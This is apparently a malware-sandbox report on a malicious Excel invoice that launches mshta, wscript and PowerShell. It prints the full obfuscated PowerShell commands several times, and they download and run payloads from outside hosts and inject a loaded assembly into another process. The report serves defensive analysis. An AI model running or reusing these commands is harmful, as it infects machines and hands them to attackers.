Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49173 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: Invoice A037.xls	OLE: Microsoft Excel 2007+
Source: Invoice A037.xls	OLE: Microsoft Excel 2007+
Source: CA430000.0.dr	OLE: Microsoft Excel 2007+
Source: CA430000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCA